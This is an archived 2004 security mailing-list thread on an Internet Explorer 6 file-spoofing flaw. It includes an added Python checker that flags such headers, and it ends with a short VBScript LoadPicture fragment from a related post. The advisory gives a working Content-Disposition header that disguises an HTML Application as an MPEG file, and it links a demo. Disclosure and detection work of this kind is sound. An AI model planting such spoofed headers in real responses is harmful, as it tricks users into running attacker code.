> header - Content-Disposition is used whenever you e.g. output a binary
> file from a serverside script and want the filename to be displayed as
> "ProjectScope.doc" instead of "download.php" (your script's name).
>
> The Content-Disposition HTTP header itself is not to blame, it is a
> standard MIME header from RFC 1806 that has been widely implemented in
> all browsers precisely to allow arbitrary filenaming.
>
> Since IE cannot display the data itself, it displays the Open/SaveAs
> dialog box so that the user can decide. The %2E in the filename is URL
> decoded and displayed as a . (dot) in the dialog. This URL decoding
> should simply not be performed as we are dealing with a file dialog and
> not a URL dialog, if %2E had not been decoded we would not be having
> this issue.
>
> Whatever action the user takes is then handled by Windows Explorer, we
> are now no longer dealing with IE. Windows Explorer determines what
> application to open the data with based on lesser rules than Internet
> Explorer, for one it does not look at the Content-Type header since it
> does not know about it. The first step of action is to compare the file
> extensions, only in the case of an unknown file extension does Windows
> Explorer perform its "magic filetype" guessing by inspecting the file's
> content.
>
> The file extension in Windows is no longer limited to 3 characters,
> though historical reasons have kept most application extensions confined
> to these. Windows Explorer parses the filename, excluding its path, and
> determines that the file extension is everything following the last .
> (dot) character, in this case ".{GUID}%2Efunny.mpeg". Common extensions
> are either a set of printable characters or a GUID, with the latter
> having priority over the former. After this, a lookup is performed in
> the registry for HKCR\CLSID\.GUID and HKCR\.EXT, with EXT being the file
> extension that we discovered and GUID the CLSID we found, and a match is
> found for the GUID prior to the entire file extension. The GUID points
> at "HTML Application" which points at MSHTA.EXE, which is then used to
> display the data.
>
> As with the ".Folder" issue, this definitely eases social engineering.
> Internet Explorer should not URL decode strings for file dialogs and
> Windows Explorer should not give precedence to CLSIDs.
>
>
> [0] http://msdn.microsoft.com/workshop/networking/moniker/overview/appendix_a.asp
>
>
>
> Regards
>
> Thor Larholm
> Senior Security Researcher
> PivX Solutions
> 24 Corporate Plaza #180
> Newport Beach, CA 92660
> http://www.pivx.com
> [EMAIL PROTECTED]
> Phone: +1 (949) 231-8496
> PGP: 0x5A276569
> 6BB1 B77F CB62 0D3D 5A82 C65D E1A4 157C 5A27 6569
>
> PivX defines "Proactive Threat Mitigation". Get a FREE Beta Version of
> Qwik-Fix 
>
> - Original Message - 
> From: "[EMAIL PROTECTED]" <[EMAIL PROTECTED]>
> To: <[EMAIL PROTECTED]>
> Sent: Tuesday, January 27, 2004 9:28 AM
> Subject: [Full-Disclosure] GOOROO CROSSING: File Spoofing Internet Explorer 6
>
>
> >
> >
> > Tuesday, January 27, 2004
> >
> > Trivial file spoofing in Internet Explorer 6.0.2800.1106 and all
> > of 'its' patches to date on WIN XP [probably others]:
> >
> > Content-Disposition: attachment; filename=malware.{3050f4d8-98B5-11CF-BB82-00AA00BDCE0B}fun_ball_gites_pie_throw%2Empeg"
> >
> > Absolute bare minimum working demo [perhaps even feeble] as we
> > are absolutely confident the self-appointed resident gooroo will
> > be along shortly handing out packets of two cents to everyone
> > thus saving us the effort to illustrate in even greater detail
> > to those lacking imagination:
> >
> >
> > http://www.malware.com/gooroo.html
> >
> >
> >
> > End Call
> >
> > -- 
> > http://www.malware.com
> >
> >
> >
> >
> >
> >
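As an added example that is not part of the original thread, the Python below models the two parsing steps Thor Larholm's reply describes (IE URL-decodes the Content-Disposition filename before showing the Open/Save dialog; Windows Explorer then takes everything after the last dot of the leaf name as the extension and gives an embedded CLSID precedence) and turns them into a check that flags headers carrying the spoofing indicators. The sample headers are constructed; the CLSID constant is the one quoted in the original post; the `filename=` regex, the function names and the indicator wording are this example's own assumptions, and the registry lookup itself is not reproduced, only the extension-splitting the text describes.

```python
# Added example (not code from the original thread): models the two parsing
# steps Thor Larholm describes and flags Content-Disposition filenames that
# show the spoofing indicators. Sample headers below are constructed.
import re
from urllib.parse import unquote

# CLSID quoted in the original post; per the thread it resolves to
# "HTML Application" (MSHTA.EXE) on the affected IE 6 / XP setup.
HTA_CLSID = "{3050f4d8-98b5-11cf-bb82-00aa00bdce0b}"

GUID_RE = re.compile(
    r"\{[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\}", re.I)
PCT_RE = re.compile(r"%[0-9a-f]{2}", re.I)
# Assumed, simplified parameter grammar: enough for the plain and quoted
# filename= forms seen in the thread, not a full RFC 2183/6266 parser.
FILENAME_RE = re.compile(r'filename\s*=\s*"?([^";]+)"?', re.I)


def parse_filename(header_value):
    """Return the filename parameter of a Content-Disposition value, or None."""
    m = FILENAME_RE.search(header_value)
    return m.group(1).strip() if m else None


def displayed_name(raw_name):
    """What the thread says IE's Open/Save dialog shows: the URL-decoded name."""
    return unquote(raw_name)


def extension(name):
    """Extension as the thread says Explorer finds it: the text after the last
    '.' of the leaf name (path stripped). Empty string if there is no dot."""
    leaf = re.split(r"[\\/]", name)[-1]
    _, dot, ext = leaf.rpartition(".")
    return ext if dot else ""


def spoof_indicators(header_value):
    """Reasons a header's filename would mislead the user or Explorer; [] if clean."""
    raw = parse_filename(header_value)
    if raw is None:
        return []
    shown = displayed_name(raw)
    reasons = []
    if PCT_RE.search(raw):
        reasons.append("percent-encoding in filename; dialog would show %r" % shown)
    guids = [g.lower() for g in GUID_RE.findall(raw)]
    if guids:
        tag = " (HTML Application per the thread)" if HTA_CLSID in guids else ""
        reasons.append("CLSID in filename: %s%s" % (", ".join(guids), tag))
    if extension(raw).lower() != extension(shown).lower():
        reasons.append("displayed extension %r != raw extension %r"
                       % (extension(shown), extension(raw)))
    return reasons


# Constructed sample headers: one benign, the thread's spoof, and a
# CLSID-only variant in the style of the ".Folder" issue the reply mentions.
SAMPLE_HEADERS = [
    'attachment; filename="ProjectScope.doc"',
    'attachment; filename=malware.{3050f4d8-98B5-11CF-BB82-00AA00BDCE0B}'
    'fun_ball_gites_pie_throw%2Empeg',
    'attachment; filename="holiday.{3050f4d8-98B5-11CF-BB82-00AA00BDCE0B}"',
]


def scan(headers):
    """Map each flagged header to its indicator list; clean headers are dropped."""
    return {h: spoof_indicators(h) for h in headers if spoof_indicators(h)}


if __name__ == "__main__":
    for header, reasons in scan(SAMPLE_HEADERS).items():
        print(header)
        for r in reasons:
            print("  -", r)
```

Run stand-alone it prints the two flagged headers with their reasons; the benign `ProjectScope.doc` header produces nothing. A proxy or mail gateway rule needs only `spoof_indicators`, and the "displayed extension != raw extension" reason is the one that captures the dialog-versus-Explorer mismatch at the heart of the post.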


[Full-Disclosure] (no subject)

2004-02-07 Thread Jelmer



similar to

http://www.securityfocus.com/archive/1/248143
http://www.greymagic.com/adv/gm008-ie/
http://www.guninski.com/wmp-desc.html

no biggie


--- snip --

' VBScript: hand the attacker-chosen path to the LoadPicture function
Sub loadIt(filename)
    LoadPicture(filename)
End Sub